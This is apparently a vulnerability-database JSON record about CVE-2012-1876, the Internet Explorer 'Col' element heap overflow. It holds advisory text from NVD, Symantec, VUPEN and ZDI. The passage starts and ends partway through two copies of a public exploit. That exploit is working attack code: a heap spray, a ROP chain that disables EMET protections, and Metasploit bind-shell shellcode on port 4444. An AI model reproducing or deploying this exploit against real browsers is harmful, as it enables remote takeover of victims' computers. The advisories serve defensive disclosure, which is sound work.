DS:[ESI],EAX\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u01b8%u0000\"); // offset to NtProtectVirtualMemory unhooked\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory)\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%uffff%uffff\"); // ProcessHandle\r\n shellcode+= unescape(\"%u5f38%u07d2\"); // *BaseAddress\r\n shellcode+= unescape(\"%u5f34%u07d2\"); // NumberOfBytesToProtect\r\n shellcode+= unescape(\"%u0040%u0000\"); // NewAccessProtection\r\n shellcode+= unescape(\"%u5f30%u07d2\"); // OldAccessProtection\r\n shellcode+= unescape(\"%u5f38%u07d2\"); // Reget pointer\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0558%u0000\"); // Offset to EMET mitigations switch\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0000%u0000\"); // NULL\r\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n \r\n // Performing a standard Kumeh maneuver ... 
(VirtualProtect mona chain)\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBX\r\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\r\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\r\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\r\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\r\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\r\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX\r\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\r\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\r\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\r\n \r\n // Store various pointers here\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u18eb\"); // NOPs\r\n shellcode+= unescape(\"%u4242%u4242\"); // OldAccessProtection\r\n shellcode+= unescape(\"%u0564%u0000\"); // Size for NtVirtualProtectMemory\r\n shellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack*\r\n shellcode+= \"EMET\"; // EMET string\r\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // Store various pointers here\r\n \r\n // EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread\r\n // MOV EAX,DWORD PTR DS:[076D10BCH]\r\n // MOV EAX,DWORD PTR DS:[007D25F48H]\r\n // MOV ESI,DWORD PTR [EAX+518H]\r\n // SUB ESP,2CCH\r\n // MOV DWORD 
PTR [ESP],10010H\r\n // MOV EDI,ESP\r\n // MOV ECX,2CCH\r\n // ADD EDI,4\r\n // SUB ECX,4\r\n // XOR EAX,EAX\r\n // REP STOS BYTE PTR ES:[EDI]\r\n // PUSH ESP\r\n // PUSH 0FFFFFFFEH\r\n // CALL ESI\r\n shellcode+= unescape(\"%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec\" +\r\n \"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" +\r\n \"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" +\r\n \"%ufe6a%ud6ff\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // EMET disable part 0x02 end\r\n \r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n \r\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\r\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\r\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\r\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\r\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\r\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\r\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\r\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\r\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\r\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\r\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\r\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\r\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\r\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\r\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\r\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\r\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\r\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\r\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\r\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\r\n 
\"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\r\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\r\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\r\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\r\n \"%u006a%uff53%u41d5\");\r\n \r\n // Total spray should be 1000\r\n var padding = unescape(\"%u9090\");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n \r\n shellcode+= padding;\r\n \r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n \r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n \r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n \r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n \r\n var spray = new Array();\r\n \r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n \r\nfunction leak(){\r\n var leak_col = document.getElementById(\"132\");\r\n leak_col.width = \"41\";\r\n leak_col.span = \"19\";\r\n}\r\n \r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n \r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById(\"132\");\r\n evil_col.width = \"1312272\"; // 0x07D25E40\r\n evil_col.span = \"44\";\r\n}\r\n \r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n \r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-02-17] #", "published": "2014-11-18T00:00:00", "references": [], "reporter": "ryujin", "modified": "2014-11-18T00:00:00", "href": "https://0day.today/exploit/description/22895"}
{"cve": [{"lastseen": "2021-02-02T05:59:47", "description": "Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by attempting to access a nonexistent object, leading to a heap-based buffer overflow, aka \"Col Element Remote Code Execution Vulnerability,\" as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012.", "edition": 5, "cvss3": {}, "published": "2012-06-12T22:55:00", "title": "CVE-2012-1876", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1876"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/a:microsoft:ie:9", "cpe:/a:microsoft:ie:6", "cpe:/a:microsoft:ie:8", "cpe:/a:microsoft:ie:7"], "id": "CVE-2012-1876", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1876", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:ie:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:7:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2018-03-13T12:07:38", "bulletinFamily": "software", "cvelist": ["CVE-2012-1876"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. 
Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 SP1 \n * Microsoft Internet Explorer 6.0 SP2 \n * Microsoft Internet Explorer 6.0 SP3 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities. Note, however, that the public exploits for this issue collected on this page bypass ASLR, DEP and EMET by using an information leak, so these schemes raise the bar but do not prevent exploitation; only the MS12-037 update removes the flaw.\n\nThe vendor released an advisory along with fixes to address this issue. 
Please see the references for more information.\n", "modified": "2012-06-12T00:00:00", "published": "2012-06-12T00:00:00", "id": "SMNTC-53848", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53848", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2012-1876 Col Element Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-1876"], "description": "VUPEN Security Research - Microsoft Internet Explorer "Col" Element \r\nRemote Heap Overflow (MS12-037 / CVE-2012-1876)\r\n\r\nWebsite : http://www.vupen.com/english/research.php\r\n\r\nTwitter : http://twitter.com/vupen\r\n\r\n\r\nI. BACKGROUND\r\n---------------------\r\n\r\n"Microsoft Internet Explorer is a web browser developed by Microsoft and\r\nincluded as part of the Microsoft Windows line of operating systems with\r\nmore than 60% of the worldwide usage share of web browsers." (Wikipedia)\r\n\r\n\r\nII. DESCRIPTION\r\n---------------------\r\n\r\nVUPEN Vulnerability Research Team discovered a critical vulnerability\r\nin Microsoft Internet Explorer.\r\n\r\nThe vulnerability is caused by a heap overflow error in the mshtml.dll\r\nmodule when processing "Col" elements, which could allow remote attackers\r\nto leak memory and execute arbitrary code despite ASLR and DEP.\r\n\r\nCVSS Score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n\r\nIII. 
AFFECTED PRODUCTS\r\n---------------------------\r\n\r\nMicrosoft Internet Explorer 10\r\nMicrosoft Internet Explorer 9\r\nMicrosoft Internet Explorer 8\r\nMicrosoft Internet Explorer 7\r\nMicrosoft Internet Explorer 6\r\n\r\nMicrosoft Windows 8 for 32-bit Systems\r\nMicrosoft Windows 8 for x64-based Systems\r\nMicrosoft Windows 7 for 32-bit Systems\r\nMicrosoft Windows 7 for 32-bit Systems Service Pack 1\r\nMicrosoft Windows 7 for x64-based Systems\r\nMicrosoft Windows 7 for x64-based Systems Service Pack 1\r\nMicrosoft Windows Server 2008 for 32-bit Systems\r\nMicrosoft Windows Server 2008 for 32-bit Systems Service Pack 2\r\nMicrosoft Windows Server 2008 for x64-based Systems\r\nMicrosoft Windows Server 2008 for x64-based Systems Service Pack 2\r\nMicrosoft Windows Server 2008 for Itanium-based Systems\r\nMicrosoft Windows Server 2008 for Itanium-based Systems Service Pack 2\r\nMicrosoft Windows Server 2008 R2 for x64-based Systems\r\nMicrosoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\r\nMicrosoft Windows Server 2008 R2 for Itanium-based Systems\r\nMicrosoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1\r\nMicrosoft Windows Vista Service Pack 1\r\nMicrosoft Windows Vista Service Pack 2\r\nMicrosoft Windows Vista x64 Edition Service Pack 1\r\nMicrosoft Windows Vista x64 Edition Service Pack 2\r\nMicrosoft Windows Server 2003 Service Pack 2\r\nMicrosoft Windows Server 2003 x64 Edition Service Pack 2\r\nMicrosoft Windows Server 2003 with SP2 for Itanium-based Systems\r\nMicrosoft Windows XP Service Pack 3\r\nMicrosoft Windows XP Professional x64 Edition Service Pack 2\r\n\r\n\r\nIV. 
Binary Analysis & Exploits/PoCs\r\n---------------------------------------\r\n\r\nIn-depth technical analysis of the vulnerability and a functional exploit\r\nincluding ASLR and DEP bypass are available through the VUPEN BAE\r\n(Binary Analysis & Exploits) portal:\r\n\r\nhttp://www.vupen.com/english/services/ba-index.php\r\n\r\nVUPEN Binary Analysis & Exploits Service provides private exploits and\r\nin-depth technical analysis of the most significant public vulnerabilities\r\nbased on disassembly, reverse engineering, protocol analysis, and code \r\naudit.\r\n\r\nThe service allows governments and major corporations to evaluate risks, and\r\nprotect infrastructures and assets against new threats. The service also\r\nallows security vendors (IPS, IDS, AntiVirus) to supplement their internal\r\nresearch efforts and quickly develop both vulnerability-based and\r\nexploit-based signatures to proactively protect their customers from attacks\r\nand emerging threats.\r\n\r\n\r\nV. VUPEN Threat Protection Program\r\n-----------------------------------\r\n\r\nGovernments and major corporations which are members of the VUPEN Threat\r\nProtection Program (TPP) have been proactively alerted about the \r\nvulnerability\r\nwhen it was discovered by VUPEN in advance of its public disclosure, and\r\nhave received a detailed attack detection guidance to protect national and\r\ncritical infrastructures against potential 0-day attacks exploiting this\r\nvulnerability:\r\n\r\nhttp://www.vupen.com/english/services/tpp-index.php\r\n\r\n\r\nVI. SOLUTION\r\n----------------\r\n\r\nApply MS12-037 security update.\r\n\r\n\r\nVII. CREDIT\r\n--------------\r\n\r\nThis vulnerability was discovered by Alexandre Pelletier of VUPEN Security\r\n\r\n\r\nVIII. ABOUT VUPEN Security\r\n---------------------------\r\n\r\nVUPEN is the leadering provider of advanced vulnerability research for\r\ndefensive and offensive cyber security. 
VUPEN solutions enable corporations\r\nand governments to measure and manage risks, eliminate vulnerabilities\r\nbefore they can be exploited, and protect critical infrastructures and\r\nassets against known and unknown vulnerabilities.\r\n\r\nVUPEN has been recognized as "Company of the Year 2011 in the Vulnerability\r\nResearch Market" by Frost & Sullivan.\r\n\r\nVUPEN solutions include:\r\n\r\n* VUPEN Binary Analysis & Exploits Service (BAE) :\r\nhttp://www.vupen.com/english/services/ba-index.php\r\n\r\n* VUPEN Threat Protection Program (TPP) :\r\nhttp://www.vupen.com/english/services/tpp-index.php\r\n\r\n\r\nIX. REFERENCES\r\n----------------------\r\n\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms12-037\r\nhttp://www.vupen.com/english/research.php\r\n\r\n\r\nX. DISCLOSURE TIMELINE\r\n-----------------------------\r\n\r\n2012-02-02 - Vulnerability Discovered by VUPEN and used at Pwn2own\r\n2012-06-12 - Public disclosure\r\n", "edition": 1, "modified": "2012-06-25T00:00:00", "published": "2012-06-25T00:00:00", "id": "SECURITYVULNS:DOC:28204", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28204", "title": "VUPEN Security Research - Microsoft Internet Explorer "Col" Element Remote Heap Overflow (MS12-037 / CVE-2012-1876)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-1876"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-093 : (Pwn2Own) Microsoft Internet Explorer Fixed Table Colspan\r\nRemote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-093\r\nJune 12, 2012\r\n\r\n- -- CVE ID:\r\nCVE-2012-1876\r\n\r\n- -- CVSS:\r\n9, AV:N/AC:L/Au:N/C:P/I:P/A:C\r\n\r\n- -- Affected 
Vendors:\r\n\r\nMicrosoft\r\n\r\n- -- Affected Products:\r\n\r\nMicrosoft Internet Explorer\r\n\r\n- -- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 12380.\r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n- -- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Microsoft Internet Explorer. User interaction\r\nis required to exploit this vulnerability in that the target must visit a\r\nmalicious page or open a malicious file.\r\n\r\nThe specific flaw exists within the way Internet Explorer handles\r\ndynamically changed colspans on a column in a table with the\r\ntable-layout:fixed style. If the colspan is increased after initial\r\ncreation it will result in a heap overflow. This can lead to remote code\r\nexecution under the context of the current program.\r\n\r\n- -- Vendor Response:\r\n\r\nMicrosoft has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\n\r\nhttp://www.microsoft.com/technet/security/bulletin/MS12-037.mspx\r\n\r\n\r\n- -- Disclosure Timeline:\r\n2012-03-14 - Vulnerability reported to vendor\r\n\r\n2012-06-12 - Coordinated public release of advisory\r\n\r\n- -- Credit:\r\nThis vulnerability was discovered by:\r\n\r\n* VUPEN Vulnerability Research Team http://www.vupen.com\r\n\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. 
TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 10.2.0 (Build 1950)\r\nCharset: utf-8\r\n\r\nwsBVAwUBT9eb7FVtgMGTo1scAQKNTwgApmw+usQ6/yMLe/mW84cS02tPb3WWxedh\r\nYsnzwiULe1YnuuEMYrEgXPDJbZkIp9OljLd6nYSIcAgdCUxck6XvBjqQmy82J1gT\r\nCLiB2nkStM0nPV0cGmbtBdmD/l2enasbBNv46AuKVP5CcwvngBuGxyTZIij0QDrS\r\n0vdKQql8lG6roQGkcUW6yad8NKmT9zIwlp75UQxMP8WY3yr4XJ0wDPXQoHzh9A2F\r\nP8vbSQBGvd6wHPbfHogphIAYCJpczOV/3Jfj7XVgzZWVscoPC8i8q/GKXyN9J13D\r\nixmmhexOplov43549zMZ6Esl3zUW17cNBCPr06a6FHdABz4piCz1DQ==\r\n=YxaL\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-06-17T00:00:00", "published": "2012-06-17T00:00:00", "id": "SECURITYVULNS:DOC:28155", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28155", "title": "ZDI-12-093 : (Pwn2Own) Microsoft Internet Explorer Fixed Table Colspan Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:47", "bulletinFamily": "software", "cvelist": ["CVE-2012-1876", "CVE-2012-1875", "CVE-2012-1880", "CVE-2012-1872", 
"CVE-2012-1881", "CVE-2012-1858", "CVE-2012-1878", "CVE-2012-1523", "CVE-2012-1882", "CVE-2012-1879", "CVE-2012-1874", "CVE-2012-1873", "CVE-2012-1877"], "description": "Multiple memory corruptions, code executions, information leakage.", "edition": 1, "modified": "2012-06-25T00:00:00", "published": "2012-06-25T00:00:00", "id": "SECURITYVULNS:VULN:12404", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12404", "title": "Microsoft Internet Explorer multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-03T21:05:36", "description": "Exploit for windows platform in category remote exploits", "edition": 2, "published": "2014-07-01T00:00:00", "type": "zdt", "title": "Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-07-01T00:00:00", "id": "1337DAY-ID-22396", "href": "https://0day.today/exploit/description/22396", "sourceData": "<!--\r\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass\r\n** Offensive Security Research Team\r\n** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X\r\n-->\r\n \r\n<html>\r\n<body>\r\n<div id=\"evil\"></div>\r\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table>\r\n<script language='javascript'>\r\n \r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n \r\nvar free = \"EEEE\";\r\nwhile ( free.length < 500 ) free += free;\r\n \r\nvar string1 = \"AAAA\";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n \r\nvar string2 = \"BBBB\";\r\nwhile ( string2.length < 
500 ) string2 += string2;\r\n \r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n \r\nvar div_container = document.getElementById(\"evil\");\r\ndiv_container.style.cssText = \"display:none\";\r\n \r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement(\"button\");\r\n div_container.appendChild(obj);\r\n}\r\n \r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n \r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n \r\n var 
rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n \r\n \r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = 